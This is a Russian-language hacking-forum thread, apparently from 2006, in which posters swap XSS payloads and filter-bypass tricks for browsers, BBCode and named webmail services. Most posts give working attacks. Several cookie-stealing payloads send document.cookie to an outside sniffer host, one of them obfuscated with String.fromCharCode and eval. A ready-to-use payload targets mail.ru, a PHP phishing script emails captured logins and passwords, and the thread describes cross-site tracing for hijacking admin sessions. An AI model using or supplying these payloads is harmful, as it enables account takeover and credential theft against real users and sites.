Мда...СОВСЕМ не факт имхо... Имхо ну для начало вот так, HTML: <span style='background:url("javascript:alert()");'>wj</span> В скобках обязательно нужно писать какие нить данные, ибо это грамматически правильно и тогда тоже будет работать в Фаерфокс. Если же в скобках укажешь пустату, то пустотой у тебя и будет в Фаерфоксе. То есть будет только работать в ИЕ и в Опера, а в Фаерфокс - НЕТ!!!!!! Хотя это даже не важно и не является фактом ибо в Фаерфоксе ведь все ровно защита от таких выкрутасываний имхо. А то что кавычки фильтруются, то и это не беда ибо в параметрах (То, что идет после знака равенства) можно кодировать в HTML entities. Используй эту ссылку для шифровки. http://ha.ckers.org/xss.html В самом низу. Кстати и античату не мешало бы сделать что нить такое а то приходится ссылаться на другие классные проекты. Чем мы хуже имхо спрашивается имхо????"!"!"!"!" К примеру это, HTML: <span style=background:url('javascript:alert(/wj/)')>wj</span> Будет тоже работать и вот так, HTML: <span style=background:url('javascript:alert(/wj/)')>wj</span>
А вот еще вопрос... а можно ли как-то проводить активный КСС если у жертвы отключены картинки... я так понимаю background-image уже не пойдет... а onmouseover как-то не совсем надежно....
А хе, очень даже интересная тема, что именно работает в плане картинок или что нить такое если картинки отключены. Щас буду тестировать. Я знаю, что вот так, HTML: <iframe src="javascript:alert(/wj/)">wj</iframe> будет работать вне зависимости если браузер ИЕ, ФФ или Опера или если картинки выключены. Тоже, самый лучший способ это использовать функцию onerror=alert(/wj/) которая тоже работает во всех трех браузерах. А насчет картинок думаю протесчу может новое что нить найду. В принципе если Джаваскрипт включен а картинки выключены, то это не беда, но мне интересно будет ли работать onerror=alert(/wj/) если картинки отключены. Ведь он будет только работать ПОСЛЕ загрузки картинки и если картинку закачать не удалось, то тогда сработает онеррор....но хотя протесчу посмотрю, что может из этого быть.
В принципе, вот только что протестил с отключенными картинками в ИЕ, вот так HTML: <img src="javascript:alert(/wj/)"> не работает, а вот так, HTML: <img src="javascript:alert(/wj/)"> <script>onerror=alert(/wj/)</script> - Да. Так что если картинки отключены, то это совсем таки не беда. Это Я типа пример дал. Onerror рулит это мое личное мнение имхо. Надо просто уметь им пользоваться. EDIT: Но однако опять сделал тест, onerror в этом случае работает не из-за онеррор... Ибо так, HTML: <script>onerror=alert(/wj/)</script> Будет тоже работать само по себе. Ща будем еще думать. EDIT: Кстати пока искал, понял почему онеррор работает сам по себе. HTML: <span style=background:url('javascript:wjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwj=alert(/wj/)')>wj</span> Так тоже будет работать в ИЕ. То есть оказывается не важно, что идет до параметров! Они в этом случае становятся наименованиями. HTML: <script>wjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwj=alert(/wj/)</script> Кстати если ты отключишь картинки, то ты в принципе их не отключишь, а заблокируешь автоматически закружатся вот. HTML: <img src="javascript:alert(/wj/)"> С отключенными картинками в ИЕ, ты приведешь браузер ИЕ в состояние ФФ! То есть если правой кнопкой мыши нажмешь на "view image" алерт появится! Это состояние является включенным по умолчанию в браузере Фаерфокс. EDIT: Кстати еще добавлю, что если написать вот так, HTML: <img src="http://forum.antichat.ru/antichat/pic/logo.gif" onLoad="alert(/wj/)"> то тоже будет алерт во всех браузерах. То есть если картинка существует. Если же она НЕ существует, то думаю, что всем понятно и так, что следует писать вот так, HTML: <img src="http://forum.antichat.ru/antichat/wj/logo.gif" onError="alert(/wj/)">
HTML: [quote][color=white][email]wj@wj[url=style=display:none;background:url(javascript:document.images[1].src="http://antichat.org/s/antichat.gif?"+document.cookie);][/url].com[/email][/color][/quote] HTML: [url=http://www.wj.com wj[url=http://www.wj.com style=display:none;background:url('javascript:alert("wj")') wj]][/url][/url] HTML: [url=http:// wj[url= style=background:url(javascript:for(;;)open()) wj]][/url][/url] HTML: [url=http://www.wj.com wj[url=http://www.wj.com style=display:none;background:url('javascript:img=new/**/Image();img.src="http://antichat.org/s/login.gif?"+document.cookie;') wj]][/url][/url] HTML: <script>img=new Image();img.src="http://antichat.org/s/login.gif?"+document.cookie;</script> Вот такие тоже бывают примеры вот. Это все полезно для новичков чтобы знали как это все выглядит. Мы старые, должны новичком помогать и их обучать вот.
HTML: <img src=http://www.xss.gif s='"p">'onerror=alert(/wj/) style=visibility:hidden> Вот так ломается mail.ru, inbox.ru, bk.ru, list.ru, rambler.ru, и другие, а главное, что работает проверенно в Опере, Фаерфокс и ИЕ. (Сейчас четвертое Марта, 2006 год) А вот так ломается инвизион 2.* HTML: [img]/[snapback] onerror=alert(/wj/) [/snapback].gif[/img] Где Я поставил табуляции вместо пробелов. И обратите внимание, что элемент img, не терпит в своем параметре какого либо пробела чтобы сработала функция onerror! Это можно ТОЛЬКО обойти посредством слеша (/) или точкой с запитой. (;) То есть вот так вот, Именно из-за пробела в атрибуте src элемента img, в браузере фаерфокс скрипт не сработает! Но за-то вот так вот - сработает. HTML: <img src="http://www.wj.gif/<a href=" onerror=alert('wj') style="display:none;"> Или, HTML: <img src="http://www.wj.gif;<a href=" onerror=alert('wj') style="display:none;"> И еще, если этот же код написать в Опере, то работать не будет из-за style="display:none;" но это не беда, ибо можно просто написать вот так вот и все везде будет работать, будучи не видимо для пытливых глаз: HTML: <img src="http://www.wj.gif;<a href=" onerror=alert('wj') style="visibility:hidden"> Воруем куки... HTML: <img src=javascript:i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;> И еще, иногда обойти фильтры посредством HTML объектов не удается, (w) тогда приходится прибегать к урл кодировки о которой Я еще не нашел, чтобы кто нибудь знал. HTML: <img src="javascript:alert('wj')"> Кодируем в урл кодировку, HTML: <img src="javascript:%61%6C%65%72%74%28%27%77%6A%27%29"> Честно говорю, что очень мало кто знает об этом способе.... Ну и надо еще знать, что закодировать в урл кодировку можно только после протокола JavaScript и т.д. Иногда приходится угнать куки при помощи vbscript, а как это делается? vbscript как Я теперь узнал, не поддерживает способы вызывать браузерам картинки так, как это в состоянии делать JavaScript, (По крайней мере Я таких примеров не встречал и не нашел) но это не беда, поскольку мы можем обходить эту дилемму посредством перехождения с одного протокола на другой. HTML: <img src=vbscript:window.execScript("img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;")> И опять таки, иногда провести onerror() можно, а все параметры как нам на зло фильтруются и идет жуткая фильтрация на HTML объекты и на прочею дребедень. Ну тогда можно прибегнуть к нашему любимому String.fromCharCode() <!-- Это нельзя писать произвольно, то большими буквами, то маленькими, то есть вот так, String.FromCharCode() работать у вас не будет. --> И так, используем уже готовую ссылку, http://ferruh.mavituna.com/stringfromcharcode.asp? И кодируем следующую строку. HTML: document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie; Которая есть ни что иное как код сниффера, который работает к примеру вот так, в таком виде: HTML: <img src="http://www.badimage.gif" onerror='document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;'> И получаем следующие: Char : Ascii : JS Code : HTML: String.fromCharCode(100,111,99,117,109,101,110,116,46,105,109,97,103,101,115,91,48,93,46,115,114,99,61,34,104,116,116,112,58,47,47,97,110,116,105,99,104,97,116,46,114,117,47,99,103,105,45,98,105,110,47,115,46,106,112,103,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59); Ну а теперь применяем наш закодированный вариант, в совокупности функцией eval() HTML: <img src="http://www.badimage.gif" onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,105,109,97,103,101,115,91,48,93,46,115,114,99,61,34,104,116,116,112,58,47,47,97,110,116,105,99,104,97,116,46,114,117,47,99,103,105,45,98,105,110,47,115,46,106,112,103,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59));> Смотрим лог сниффера, http://www.antichat.ru/sniff/log.php Если кто нибудь хочет узнать как создавать липовые страницы, то вот Я описал этот метод на этой ссылки. http://video.antichat.net/file181.html White Jordan. Администрация несет полную ответственность за ваши взломы.
HTML: <img src=http://www.xss.gif s='"p">'onerror=i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie; style=visibility:hidden> Просто все хотели готовый код куки воровать на mail.ru так что вот вам. Резвитесь. P.S. Чтобы обезопасится от такой атаки, достаточно просто выключить загрузку картинок в своем браузере. Но однако не совсем ок, ибо логически можно провести атаку метода Tarce, о котором Я как нить тоже напишу статью. Method Trace Метод Trace, это такой способ, который позволяет проводить атаку XSS вне зависимости где находится жертва. Как мы все знаем, куки не переходят от одной области в другую, то есть если Я сейчас создам страницу на narod.ru с кодом воровки кук, и тут на античатовском форуме пройдусь по этой ссылки залогинившися при этом в мой аккунт, то мои куки полетят на сниффер от НАРОДА а не от форума античата. С методом трейс однако, это легко обходится. Болие того, если картинки отключены, то тоже реально упереть куки если провести эту атаку, которую можно провести где угодно. Понимайте метод трейс, как метод атаки XSS на WWW в любом месте, в любое время. Как узнать если этот метод поддерживается? Очень просто, он всегда включен по умолчанию, но можно и проверить написав код или на Джаваскрипт, или же воспользоваться этой ссылкой. http://web-sniffer.net/ Можно ли ломануть античатовский форум этим методом? Да! Реально ли? Да! Убийство ли это времени? О да! +) Как? Да очень просто, совсем не обязательно просить или нудить кого нибудь посетить нашу ссылку которая будет воровать куки Админов а то и сессию админской панели, когда это можно сделать в любом месте и сделать чтобы скрипт срабатывал автоматически и без ведо админа, ну к примеру просто послав Админу или кому угодно на античате на мыло к примеру мейл.ру письмо, или туда где админ или наша жертва обитает будь то уязвимый форум, чат т.д. и вместо кода сниффера для мейл.ру, впаять код сниффера для античатовского форума. Так как ИП теперь у нас привязывается к сессии (Кстати это из-за меня +) ) и кук нам не совсем достаточно, то есть два пути: 1. Или уловить админа и своровать админ-панельские куки, которые можно тут же применить и выполнить с ними собственный скрипт сделав себя админом, или же, узнавать с помощью скрипта мыльники пользователей и их взламывать, что для меня очень легко делать через XSS. Потом можно сделать себе ретрив паролей. +) Ну логически будет просто метод трейс отключить так? Ведь все что нужно, так это отключить на античате этот метод и усе..... А ведь можно еще и заставить проксю, то есть прокси сервер которым античатовец пользуется, вернуть нам трейс информацию, то есть - его куки. +) Короче вот интересная чтива. http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf http://www.modsecurity.org/archive/amit/xst_strikes_back.txt Тут очень все ясно и понятно.
Вот Джордан передал чтиво: http://www.r-i-p.info/artview.php?id=182 и еще кое что: http://www.cyberinfo.ru/16/3181_1.htm
Один из видов воровки кук. Кодируем в урл то, что надо и все. http://ha.ckers.org/xss.html Сам файл. PHP: <? if(isset($_POST['login']) && isset($_POST['passwd'])){ mail("[email protected]", "privet", $_POST['login'].":".$_POST['passwd']); header("Location: http://www.antichat.ru/"); } ?> Кому надо тот поймет.
Ссылку дай тех кого Я копирую? Если Я на кого нить ссылаюсь, то как ты уже заметил, Я или даю ссылку или говорю автора. Все остальное что Я здесь написал, это Я все нашел сам не зависимо от тех, кто это нашел до меня, или же после. И ни кого Я не копирую ибо некого и копировать.
да нет.. мы тебя проводили достойно! Загляни в репу и узнаешь -) ток того забаненного..) Давай, гений... пора тебе ненадолго свалить чтоль.. не ну без обид! Исчезни плз! Будь другом!
Блин и Англичане просят того же!....мда.....складывается у меня мнение, что Я никому не нужен на интернете.... =((((((((((((((((((((((((((((((((((((((( А вот Я уйду да? КТО будет писать тогда Гениальные статьи? КТО будет веселить и смешить народ?
Веселить и смешить народ будет табачок.. у него кстати неплохо получается.. со своими песенками и асталом. За тобой закрепился другой имидж... гениальные статьи нынче не в моде..! Их все равно большинство не понимает. Ну ты уйди, а там видно будет.. Девушку себе заведи.. встречайся с ней, люби. На пользу будет.
